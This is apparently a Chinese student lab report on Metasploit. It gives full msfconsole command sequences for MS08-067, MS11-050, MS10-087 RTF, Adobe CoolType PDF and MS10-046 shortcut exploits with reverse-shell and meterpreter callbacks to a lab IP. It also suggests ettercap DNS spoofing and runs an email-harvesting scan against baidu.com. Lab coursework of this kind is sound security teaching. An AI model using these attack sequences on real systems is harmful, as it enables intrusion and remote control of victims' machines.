本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体须要完成:html
一个主动攻击实践,如ms08-067; (1分)shell
一个针对浏览器的攻击,如ms11-050;(1分)windows
一个针对客户端的攻击,如Adobe;(1分)api
成功应用任何一个辅助模块。(0.5分)浏览器
以上四个小实践可不限于以上示例,并要求至少有一个是和其余全部同窗不同的,不然扣除0.5分。安全
Exploit
模块
Payload
模块
Encoder
模块
payload
进行编码,能够经过多种编码手段、屡次编码方式有效的改变payload
代码特征payload
做用,但能对payload
进行加工Aux
模块
Post
模块
search name
:用指定关键字搜索能够利用的漏洞模块use exploit name
:使用漏洞show options
:显示配置选项set option name option
:设置选项show payloads
:回链攻击载荷show targets
显示目标(os版本)set TARGET target number
:设置目标版本exploit
:开始漏洞攻击sessions -l
:列出会话sessions -i id
:选择会话sessions -k id
:结束会话Ctrl+z
:把会话放到后台Ctrl+c
:结束会话show auxiliary
:显示辅助模块use auxiliary name
:使用辅助模块set option name option
:设置选项exploit
:运行模块exploit
,payload
,encode
。
exploit
:测试者利用系统,程序,或服务的漏洞进行攻击的一个过程。payload
:攻击者在目标系统上执行的一段攻击代码,该代码具备返弹链接,建立用户,执行其余系统命令的功能。encode
:encode
编码一是为了不使攻击载荷不能完整运行的“坏字符”,二是为了改变特征码,帮助攻击载荷避免被杀软发现。返回目录ruby
①攻击机:kali ②靶机:windows XP SP3(English)服务器
在攻击机kali输入msfconsole
进入控制台,依次输入如下指令:网络
use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
//tcp反向回连set LHOST 192.168.130.130
//攻击机ipset LPORT 5303
//攻击端口set RHOST 192.168.130.133
//靶机ip,特定漏洞端口已经固定set target 0
//自动选择目标系统类型,匹配度较高exploit
//攻击创建会话,攻击成功结果以下:session
①攻击机:kali ②靶机:WindowsXP Professional sp2/Windows7专业版 ③IE版本:7.0/8.0
在攻击机kali输入msfconsole
进入控制台,依次输入如下指令:
use windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_http
//http反向回连set LHOST 192.168.130.130
//攻击机ipset LPORT 5303
//攻击端口固定set URIPATH 2015dwj
//统一资源标识符路径设置exploit
在浏览器输入http://192.168.130.130:8080/2015dwj
,IE出现弹窗,警告遇到问题需关闭程序:
此时攻击机正在尝试创建会话,但靶机已经禁止访问了该网页。失败。
第二次在IE中访问特定URI,此次回车刚一敲下去,连界面都尚未弹出来,又被kill了:
严肃地思考:是否是浏览器或者靶机系统的问题?看看还有哪些系统或软件会存在这个漏洞吧:
因而尝试了winXP/win7和IE7.0/IE8.0等等排列组合,费尽周折配置好了几种环境,但是仍是失败了。
去网上搜各类『ie已经为了帮助保护您的计算机而关闭此网页-百度经验』、『使用ie8 提示Internet Explorer 已经为了帮助保护您的计算机而关闭此网页,怎么解决』、『Win7系统下IE浏览器提示“IE为了保护计算机而关闭网页”的问题分析及解决方法』等等等等解决方案,根据前人的经验教训总结出了:应该修改Internet的安全设置!
在IE浏览器打开“工具->Internet选项”,选择“安全”选项卡,将设置里面最不安全的所有选上,自定义也设置为最低等级——“中”:
除此以外,选择“高级”选项卡,选中“容许运行或安装软件,即便签名无效”:
总之,想尽一切方法下降IE浏览器的警戒性,让它老老实实地中咱们的圈套!
但是仍是失败了..且缘由至今未知(ಥ_ಥ)
①攻击机:kali ②靶机:windowsXP Professional sp2 ③Office版本:2003
在攻击机kali输入msfconsole
进入控制台,依次输入如下指令:
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set payload windows/exec
//运行一个可执行文件set CMD calc.exe
//绑定计算器程序,进行启动exploit
//攻击使用show options
命令查看一些参数值,好比文件名、绑定程序等等。此时文件名为默认,也能够进行修改。
将生成的文件从/root/.msf4/local/msf.rft
拷贝到靶机上,并使用Office2003打开。无论第几回打开,都会提示错误:
双击运行的同时,因为绑定到计算器,所以打开了计算器程序,攻击成功:
①攻击机:kali ②靶机:windowsXP Professional sp2 ③Adobe版本:9.3
在攻击机kali输入msfconsole
进入控制台,依次输入如下指令:
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
//tcp反向回连set LHOST 192.168.130.130
//攻击机ipset LPORT 5303
//攻击端口set FILENAME 20155303-2.pdf
//设置生成pdf文件的名字exploit
//攻击生成的pdf以下图所示:
将生成的pdf文件拷贝到靶机上。
在kali上输入back退出当前模块,进入监听模块,输入如下命令:
use exploit/multi/handler
//进入监听模块set payload windows/meterpreter/reverse_tcp
//tcp反向链接set LHOST 192.168.130.130
//攻击机ipset LPORT 5303
//攻击端口固定exploit
在靶机上打开20155303-2.pdf
文件:
攻击机显示攻击成功:
此时若关闭pdf文件,则失去权限,攻击失败:
①攻击机:kali ②靶机:windowsXP Professional sp2
在攻击机kali输入msfconsole
进入控制台,依次输入如下指令:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.130.130
//攻击机ipset payload windows/meterpreter/reverse_tcp
//tcp反向回连set LHOST 192.168.130.130
//攻击机ipexploit
//攻击这样一来,靶机只要在浏览器访问192.168.130.130:80
,就中了攻击者的圈套:
点击“容许”,会弹出一个攻击者IP的目录,其中有一个“快捷方式”的图标:
此时攻击机正在悄悄地链接靶机,试图创建会话:
靶机双击快捷方式,攻击机方显示成功创建会话。使用sessions -i 1
选择会话:
尝试输入shell
命令,攻击成功:
若是靶机关闭网页,攻击机仍可控制并攻击靶机:
一点小小的思考:让靶机输入攻击机的IP地址仍是有很大的局限性。若是能将DNS欺骗与之相结合,那攻击就会更加主动。在这里能够用
ettercap
,修改etter.dns
配置文件为*.cn A 192.168.130.130
。这样一来,只要受害者访问*.cn域名的时候,就会强行被欺骗成192.168.130.130:80
,从而就更加容易达到攻击者的目的啦~
use auxiliary/scanner/portscan/syn
(使用portscan模块)show options
set RHOSTS 192.168.130.130
(目标)set THREADS 50
(线程)exploit
use auxiliary/scanner/ssh/ssh_version
(使用ssh_version模块)show options
(查看选项)set RHOSTS 10.107.100.0/24
(目标网段)set THREADS 50
(线程)exploit
(开始)use auxiliary/scanner/telnet/telnet_version
(使用telnet_version模块)show options
(查看选项)set RHOSTS
10.180.100.0/24(目标网段)set THREADS 50
(线程)exploit
(开始)use auxiliary/gather/search_email_collector
(使用search_email_collector模块)show options
(查看选项)set DOMAIN baidu.com
(扫描目标)exploit
(开始)use auxiliary/scanner/discovery/arp_sweep
(使用discovery/arp_sweep模块)show options
(查看选项)set RHOSTS 10.180.100.0/24
(目标网段)set THREADS 50
(线程)exploit
(开始)如下为对所在局域网进行扫描后的结果: